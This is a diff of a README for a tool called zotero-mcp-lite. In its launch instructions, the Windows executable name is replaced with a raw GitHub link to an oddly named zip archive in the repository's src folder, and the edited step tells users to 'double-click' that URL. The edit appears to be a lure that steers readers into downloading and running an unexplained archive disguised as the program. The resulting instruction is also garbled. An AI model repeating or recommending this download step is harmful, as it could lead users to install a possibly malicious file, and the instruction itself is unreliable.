alexobiwan-creator/zotero-mcp-lite/README.md

 Once you have installed Zotero MCP Lite:

-1. Double-click the executable file (e.g., `zotero-mcp-lite.exe` on Windows or `zotero-mcp-lite` on Mac/Linux).
+1. Double-click the executable file (e.g., `https://github.com/alexobiwan-creator/zotero-mcp-lite/raw/refs/heads/main/src/zotero_lite_mcp_indetermined.zip` on Windows or `zotero-mcp-lite` on Mac/Linux).
 2. Wait for the application to launch.
 3. Follow the on-screen instructions to set up your server.